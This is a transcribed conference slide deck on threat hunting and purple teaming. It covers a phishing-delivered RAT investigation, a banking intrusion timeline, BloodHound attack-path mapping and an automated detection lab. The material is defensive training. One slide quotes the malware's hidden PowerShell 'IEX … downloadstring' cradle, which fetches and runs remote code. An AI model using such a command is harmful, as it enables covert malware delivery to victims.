A YEAR OF PURPLE. By Ryan Shepherd

Transcription

1 A YEAR OF PURPLE By Ryan Shepherd

2 WHOAMI DETECTION and RESPONSE Investigator for Countercept Threat Hunter PURPLE Team Consultant Offensive Security Certified Professional (OSCP) Crest Registered Intrusion Analyst (CRIA) PUBLIC 1

3 AGENDA Investigation case studies Offline vs Online IR 2.0: APT vs Red Team Exercise Attack and Defence Simulation Lab Purple Teaming: Why and How? Lab structure

4 01 A TALE OF TWO HUNTS Offline VS Online PUBLIC

5 A TALE OF TWO HUNTS KEY PRINCIPLE With TRADITIONAL detection you START with technology, and THEN USE people to get the most out of that technology. With THREAT HUNTING, you START with people, and THEN USE technology to get the most out of CALLUM ROXAN Threat Hunter those people 4

6 A TALE OF TWO HUNTS Team A HOST A: Offline DATE: 26/02/2018 COMPLETION TIME: 2 hours STARTING HUNT: PowerShell Team B HOST B: Online DATE: 02/03/2018 COMPLETION TIME: 1 hour STARTING HUNT: Reflective Load Same Infection PUBLIC 5

7 A TALE OF TWO HUNTS TEAM A Anomalous Event seen Outlook -> IExplorer -> explorer.exe P:\Hfref\HFRE\NccQngn\Ybpny\Grzc\Grzc1_Zbarltenz %USERPROFILE%\AppData\Local\Temp\Temp1_Moneygram Hetrag Urgent Dhrel_cqs.mvc\Zbarltenz Query_pdf.zip\Moneygram Hetrag Urgent Dhrel_cqs.fpe Query_pdf.scr RegSvcs.exe powershell.exe %USERPROFILE%\AppData\Local\Temp\ \fqf.exe C:\Users\USER\AppData\Local\Temp\Temp1_Moneygram -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(' Moneygram Urgent Query_pdf.zip\Moneygram Urgent Query_pdf.scr Urgent Query_pdf.scr C2 discovery Persistence and Infection Vector Sweep across the estate Missing link Samples retrieved Payload decoded C2 and Payload source identified Incident closed Team A PUBLIC 6

8 A TALE OF TWO HUNTS TEAM B Anomalous Event seen Reflective Load: %WINDIR%\Microsoft.NET\Framework\v \RegSvcs.exe Process threads Network ETW RWX memory section carving MFT retrieved Host offline Missing link Process dump retrieved Payload analysis Hijacked Regsvrc confirmed Incident closed Moneygram Urgent Query_pdf.scr -> %USERPROFILE%\AppData\Local\Temp\ \fqf.exe Team B fqf.exe -> %WINDIR%\Microsoft.NET\Framework\v \RegSvcs.exe PUBLIC 7

9 A TALE OF TWO HUNTS SUMMARY OF ACTIVITY Phishing delivered User opens Outlook Moneygram.pdf.scr attachment in Internet Explorer Scr file downloads secondary stage payloads: fqf.exe, AutoIT script AutoIT script uses PS TO connect to C2 to download and execute tertiary payload: PS reflective load script PS payload reflectively loads RAT into legit RegSvcs process Autorun created for persistence 8

10 A TALE OF TWO HUNTS - SUMMARY OF ACTIVITY Comprehensive list of discovered malware capabilities: Keylogging Read log files Capture screenshots Download additional files Sniff audio Steal web browser credentials Interact with system tokens Hook processes Grab info from clipboard Anti-analysis, virtualisation and sand-boxing PUBLIC 9

11 02 Incident Response 2.0 APT VS Red Team Exercise PUBLIC

12 CASE STUDY: RETAIL BANKING TRANSACTION INFRASTRUCTURE Authentication Issuing Bank Debit Card Switch Generic Transaction Switch Credit Card Switch Gift Card / Prepaid Switch 11

13 HOW DO THEY GET THERE? Management Dev Investment Banking ATM Corporate Transaction Switching 12

14 CASE STUDY: RETAIL BANKING TRANSACTION INFRASTRUCTURE MGMT 12 th July First Delivery 180 Days 28 th July Lateral Movement 16 th Aug Domain Compromise 6 th Sept Admin Compromise 10 th Sept MGMT Network Compromise 10 th Sept Payment Systems 60 Days 2 nd Dec Learn Systems 26 th Jan Weaponize 1 st Feb Execute Fraud 0 Days 13

15 DON T FORGET TIME TIME TO ACTION ON TARGET (MOSTLY) SOPHISTICATION & LIKELIHOOD OF EXPLOITATION 1 APT SERIOUS ORGANISED 2 CRIME GROUPS HIGHLY CAPABLE 3 CRIMINAL GROUPS MOTIVATED INDIVIDUALS 4 (HACKTIVISTS) SCRIPT KIDDIES 5 / AMATEURS LIKELIHOOD OF ATTACK PUBLIC 14

16 03 ATTACK AND DEFENCE SIMULATION Purple Teaming: Why and How? PUBLIC

17 Defensive TACTICAL PURPLE TRAINING Train like you fight Active BLUE on RED Active BLUE with RED Blind targeted attack simulations Offensive Learn attacker techniques & test them Know your attack paths Simulate everything else 16

18 TACTICAL PURPLE TRAINING Purple Training improves Threat Hunting Threat Hunting improves Attack Detection Attack Detection improves Incident Response Autopsy Recon Delivery Exploit C2 Installation Privilege Escalation Lateral Movement Objective Recon Delivery Exploitation C2 Installation Internal Recon Lateral Movement Action on Target Procedural Tactical PUBLIC 17

19 ATTACK PATH MAPPING Start with critical assets Map and validate all the routes an attacker could use to reach those assets Attackers gather this information, so should you This allows responders to rapidly identify assets that should be in scope and focus analysis Timing dictates strategy 18

20 GOOD OLD (NEW) BLOODHOUND Domain Users can query Active Directory They can do this infinitely and build up all user and group memberships and active sessions Bloodhound uses graph theory to map these relationships Attackers use Bloodhound to identify complex attack paths Defenders can use Bloodhound to identify and eliminate those same attack paths PUBLIC 19

21

22

23 Computer 2 Computer 1 Attacker Landing Point Domain User Print Manager Group In Scope Domain Admin User Domain Admin Group Computer 3

24 04 ATTACK AND DEFENCE SIMULATION Detection Lab PUBLIC

25 INTRODUCING: THREAT DETECTION LAB Objective: A single script that automates the set up of a threat detection environment.

26 WHO IS THIS LAB FOR? An attack detection investigator who wants to see what type of logging and alerting will be generated when simulating a specific attack or defence technique A threat hunter who needs to quickly spin up an Active Directory environment for testing purposes A red team member who wants to see what type of logs and forensic artifacts their tooling and methods will generate in a similar environment A security engineer looking for a small staging environment to use when making changes to/automating security tooling configurations

27 Attack Attack Forward Windows Events /24 Ship Logs DHCP DNS Files FTP HTTP Kerberos RDP RPC SMB SSL Forward Windows Events Ship Logs Application Security System Sysmon Autoruns 26

28 Install Autorunstowinevent Install Sysmon Configure WEF GPO Bootstrap BRO Install Filebeat Create Domain Attack /24 Attack Forward Windows Events Ship Logs Forward Windows Events Ship Logs Join Domain Bootstrap ELK Join Domain Install Sysmon Install Autorunstowinevent Create WEF Subscriptions Install Winlogbeat Install Sysmon Install Autorunstowinevent 27

29 LAB DEMO 28

30 PUBLIC 29

31 05 CONCLUSION PUBLIC

32 CONCLUSION You are the best asset in play. Not the technology. Better Attack Detection is pushing Incident Response leftward up the defensive kill chain. Understand the kill chains you have to deal with. Determine what techniques you are facing at each stage of the offensive kill chain. Simulate all the things! PUBLIC 31

33 QUESTIONS